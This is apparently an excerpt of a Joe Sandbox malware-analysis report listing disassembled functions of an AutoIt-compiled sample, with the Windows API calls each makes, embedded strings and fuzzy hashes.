Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dce3051385f9513c8f2193c8c494e043a45bb3378ce01a62320a3ced04d5b
Instruction ID: 1e7f037dfef28e1e97a3aad3686a57e2685b1f20b7fdd2d28b0308a7a17ab984
Opcode Fuzzy Hash: 680dce3051385f9513c8f2193c8c494e043a45bb3378ce01a62320a3ced04d5b
Instruction Fuzzy Hash: 5A719DB0A00119EFCF04CF98DD89AAEBB74FF85310F248159F915AB250C734AA42CF61

Function 00A72230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A7225A
_memset.LIBCMT ref: 00A72323
ShellExecuteExW.SHELL32(?), ref: 00A72368

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

Part of subcall function 00A2C6F4: _wcscpy.LIBCMT ref: 00A2C717

CloseHandle.KERNEL32(00000000), ref: 00A7242F
FreeLibrary.KERNEL32(00000000), ref: 00A7243E

Strings

@, xrefs: 00A72334

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: bb13b52aa091b266c768bb67c37f6cea8b555089516e37beb58b02d473da5e45
Instruction ID: 4fa9f7690df4736de4c5427a8e59c7c243d0881f82638612fc5f483f63140d73
Opcode Fuzzy Hash: bb13b52aa091b266c768bb67c37f6cea8b555089516e37beb58b02d473da5e45
Instruction Fuzzy Hash: 2E716075A006199FCF14EFA8D991A9EB7F5FF48310F10C569E85AAB351CB34AE40CB90

Function 00A53DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A53DE7
GetKeyboardState.USER32(?), ref: 00A53DFC
SetKeyboardState.USER32(?), ref: 00A53E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00A53E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00A53EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00A53EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A53F13

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7abdc4fa4d4e11ba37971109487764e755dee957f2b78002f83e1fbd646a5a27
Instruction ID: 4b3a53319f3dc94b0a2cd01ade6837957057464b13bc1812c12c3bd105a67201
Opcode Fuzzy Hash: 7abdc4fa4d4e11ba37971109487764e755dee957f2b78002f83e1fbd646a5a27
Instruction Fuzzy Hash: 3A51E5A26047D13DFF3643248C46BBA7EE57B46345F088989F9D54A8C2D2B4AECCD750

Function 00A53BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00A53C02
GetKeyboardState.USER32(?), ref: 00A53C17
SetKeyboardState.USER32(?), ref: 00A53C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A53CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A53CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A53D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A53D26

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7c0b474e3928daaa1a921852faf6aa55eb4aa72c43342ae47d63f580d09b6a22
Instruction ID: 654d55f980bbeeb599e18bc1293930375ca1006a6bdcfc1bcfe39f97aa7d5f48
Opcode Fuzzy Hash: 7c0b474e3928daaa1a921852faf6aa55eb4aa72c43342ae47d63f580d09b6a22
Instruction Fuzzy Hash: 9A5116A25047D53DFF3283248C05B7ABEB97B86345F088889E8D5564C2D6A4EECCD760

Function 00A57DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00A57DBE
_wcsncpy.LIBCMT ref: 00A57DF3
_wcsncpy.LIBCMT ref: 00A57E25
_wcsncpy.LIBCMT ref: 00A57E58
_wcsncpy.LIBCMT ref: 00A57E9A
_wcsncpy.LIBCMT ref: 00A57ED4
_wcsncpy.LIBCMT ref: 00A57F03

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: d69ad5531e7b2a9ce6bea06bcd20461d7425a312450908b2bbb3e847b260c52c
Instruction ID: ed5fb7fb26ccfc0d492e06c7c9652163c7710db900f481dd48957007b44be075
Opcode Fuzzy Hash: d69ad5531e7b2a9ce6bea06bcd20461d7425a312450908b2bbb3e847b260c52c
Instruction Fuzzy Hash: 1B414D66D14314B6DB10EBF49D4AACFB7ACAF05310F508966F904F3121FA34EA69C3A5

Function 00A73D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00A73DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A73DCB
FreeLibrary.KERNEL32(00000000), ref: 00A73E80

Part of subcall function 00A73D72: RegCloseKey.ADVAPI32(?), ref: 00A73DE8
Part of subcall function 00A73D72: FreeLibrary.KERNEL32(?), ref: 00A73E3A
Part of subcall function 00A73D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A73E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A73E25

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 15fb35e6bb43076c9c8a8863aa9c5a47fb136d527f3446a946279bdc133af2bc
Instruction ID: 680fa0e7a75f1a062b7e45220213ee18794b9f7c7ad953ba79f226f40a216e55
Opcode Fuzzy Hash: 15fb35e6bb43076c9c8a8863aa9c5a47fb136d527f3446a946279bdc133af2bc
Instruction Fuzzy Hash: D5310DB2A01109BFDF15DBD0DC85AFFB7BCEF08300F00816AE516A2150DA709F859B60

Function 00A78FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A78FE7
GetWindowLongW.USER32(00C4ED90,000000F0), ref: 00A7901A
GetWindowLongW.USER32(00C4ED90,000000F0), ref: 00A7904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A79081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A790AB
GetWindowLongW.USER32(00000000,000000F0), ref: 00A790BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A790D6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e332f597ed7a2272974206c0996eddb31119687b90240f82e06f87106c2d4e9c
Instruction ID: 460889006250c1b1ff484731b7fcd64402a41e95d356f8639a5747459bddea41
Opcode Fuzzy Hash: e332f597ed7a2272974206c0996eddb31119687b90240f82e06f87106c2d4e9c
Instruction Fuzzy Hash: CE313535760215EFDB20CF98EC84F6637B5FB4A714F148166F6198B2B1CB71A842DB41

Function 00A508AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A508F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A50918
SysAllocString.OLEAUT32(00000000), ref: 00A5091B
SysAllocString.OLEAUT32(?), ref: 00A50939
SysFreeString.OLEAUT32(?), ref: 00A50942
StringFromGUID2.OLE32(?,?,00000028), ref: 00A50967
SysAllocString.OLEAUT32(?), ref: 00A50975

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 57c8acd4f2e808d7c466b6460294a52e9fa680794e89a9d4c8fb7c7fc023ac1b
Instruction ID: 99bc6ec4fec869984d0dc7f5c8640671015345b61ffb0bf7e1b8a5c6f58d5599
Opcode Fuzzy Hash: 57c8acd4f2e808d7c466b6460294a52e9fa680794e89a9d4c8fb7c7fc023ac1b
Instruction Fuzzy Hash: 00219276601219AFAB10DFA8DC88DAB77FCFB49361B008126FD15DB155DA70EC458BA0

Function 00A52472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A52485
__wcsnicmp.LIBCMT ref: 00A524A6
__wcsnicmp.LIBCMT ref: 00A524C0

Strings

#notrayicon, xrefs: 00A5247D
#OnAutoItStartRegister, xrefs: 00A524BA
#requireadmin, xrefs: 00A524A0

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: da24226d0e4b9701983240b2192feeb867113ed57f5fb9eae3c3b37cb17bbd3f
Instruction ID: 798ab5dd112584300e8d62d600d8721d3920a931686de3296e1ac0b620ebd515
Opcode Fuzzy Hash: da24226d0e4b9701983240b2192feeb867113ed57f5fb9eae3c3b37cb17bbd3f
Instruction Fuzzy Hash: 3B21377224422177C220AB389D12FBB73B8FF66311F508439FC8797081EB75994AC395

Function 00A50986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A509CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A509F1
SysAllocString.OLEAUT32(00000000), ref: 00A509F4
SysAllocString.OLEAUT32 ref: 00A50A15
SysFreeString.OLEAUT32 ref: 00A50A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00A50A38
SysAllocString.OLEAUT32(?), ref: 00A50A46

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 8877aa68808d41cbfb83a4a5e640df6f5a2a280de5232f2c0e1ff3f5f7746963
Instruction ID: 1d798ec27c17c9464439d1416ad371245eea0e1668ee91d4d1267c18a6cf66b6
Opcode Fuzzy Hash: 8877aa68808d41cbfb83a4a5e640df6f5a2a280de5232f2c0e1ff3f5f7746963
Instruction Fuzzy Hash: A6214475600214AFDB10DFE8DC89DAA77ECFF483607448126FA09CB265DA70EC858764

Function 00A7A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A2D1BA
Part of subcall function 00A2D17C: GetStockObject.GDI32(00000011), ref: 00A2D1CE
Part of subcall function 00A2D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A2D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A7A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A7A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A7A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A7A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A7A360

Strings

Msctls_Progress32, xrefs: 00A7A2FE

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 61dc5b348c04e00e0d1664da7c37011320ebf3f1b97e3fa07742bd14cde2e391
Instruction ID: b400499a2d835f3d76d67402f1649101e1965dad629cc8865bc7e18eb264462e
Opcode Fuzzy Hash: 61dc5b348c04e00e0d1664da7c37011320ebf3f1b97e3fa07742bd14cde2e391
Instruction Fuzzy Hash: 321193B5150219BEEF159FA4CC85EEB7F6DFF08798F018115BA08A6060C7729C21DBA4

Function 00A2CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00A2CCF6
GetWindowRect.USER32(?,?), ref: 00A2CD37
ScreenToClient.USER32(?,?), ref: 00A2CD5F
GetClientRect.USER32(?,?), ref: 00A2CE8C
GetWindowRect.USER32(?,?), ref: 00A2CEA5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: b2903c7499e1373fb248eda840d9c0c45071fd40f5ee455107a22e4219cc46f4
Instruction ID: 1bb532367cf337e3c6cb29856dcb29a65474112b224c60ea89ebe7b1264a2c92
Opcode Fuzzy Hash: b2903c7499e1373fb248eda840d9c0c45071fd40f5ee455107a22e4219cc46f4
Instruction Fuzzy Hash: 90B16A79A00249DBDF10CFA8C5847EEBBB1FF08310F159529EC69EB250DB70AA50DB64

Function 00A71BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A71C18
Process32FirstW.KERNEL32(00000000,?), ref: 00A71C26
__wsplitpath.LIBCMT ref: 00A71C54

Part of subcall function 00A31DFC: __wsplitpath_helper.LIBCMT ref: 00A31E3C

_wcscat.LIBCMT ref: 00A71C69
Process32NextW.KERNEL32(00000000,?), ref: 00A71CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00A71CF1

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 53afd97b5b99edd83c75437872a95f339b288834f80f4afb1819846c4c52492d
Instruction ID: e4048812c7059855970b10f4d802c9c94edae4f4bb6c64759198135bf5c1f354
Opcode Fuzzy Hash: 53afd97b5b99edd83c75437872a95f339b288834f80f4afb1819846c4c52492d
Instruction Fuzzy Hash: F9516D715083009FD720EF64DD85EABB7ECEF88754F00492EF58997291EB709A45CB92

Function 00A72FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A73C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A72BB5,?,?), ref: 00A73C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A730AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A730EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A73112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A7313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A7317E
RegCloseKey.ADVAPI32(00000000), ref: 00A7318B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 2b850f2e0b3a86f397a9bd039cd67e5893912243efd1d0bc6dfcc7b10da399e9
Instruction ID: 1068028a63ec4fe6872c23c4c00b27716f58bd2c9f12ee753d3d13c84380bf3d
Opcode Fuzzy Hash: 2b850f2e0b3a86f397a9bd039cd67e5893912243efd1d0bc6dfcc7b10da399e9
Instruction Fuzzy Hash: 64512732208300AFCB04EF64CD85EAAB7E9BF89314F04891DF55597191DB71EA49DB52

Function 00A784DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A78540
GetMenuItemCount.USER32(00000000), ref: 00A78577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A7859F
GetMenuItemID.USER32(?,?), ref: 00A7860E
GetSubMenu.USER32(?,?), ref: 00A7861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 00A7866D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: ec9c27a8515c9d9f33e041f81c44242abbe556af733e4048d8186d57108763f4
Instruction ID: f77ecf42136e91d5a438a6041e331f7876345319031f203c883ccc867d7e1e76
Opcode Fuzzy Hash: ec9c27a8515c9d9f33e041f81c44242abbe556af733e4048d8186d57108763f4
Instruction Fuzzy Hash: 35518F71E00215AFCF11EFA8CA45AAEB7F5FF48710F108469E919BB351DB74AE418B90

Function 00A54AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A54B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A54B5B
IsMenu.USER32(00000000), ref: 00A54B7B
CreatePopupMenu.USER32 ref: 00A54BAF
GetMenuItemCount.USER32(000000FF), ref: 00A54C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A54C3E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: d55a2f76e7d2717ef2560c6d035d769e212a52d312f9824949293ff22116c890
Instruction ID: af9fce2bdf026795f7f96435716faefaedad01278e1e0102edc876b8300dda5a
Opcode Fuzzy Hash: d55a2f76e7d2717ef2560c6d035d769e212a52d312f9824949293ff22116c890
Instruction Fuzzy Hash: F051FF70601209EFDF24CF68D988BAEBBF4BF9831EF144119EC159B291D7709988CB11

Function 00A68DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00AADC00), ref: 00A68E7C
WSAGetLastError.WSOCK32(00000000), ref: 00A68E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00A68EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00A68EC5
_strlen.LIBCMT ref: 00A68EF7
WSAGetLastError.WSOCK32(00000000), ref: 00A68F6A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
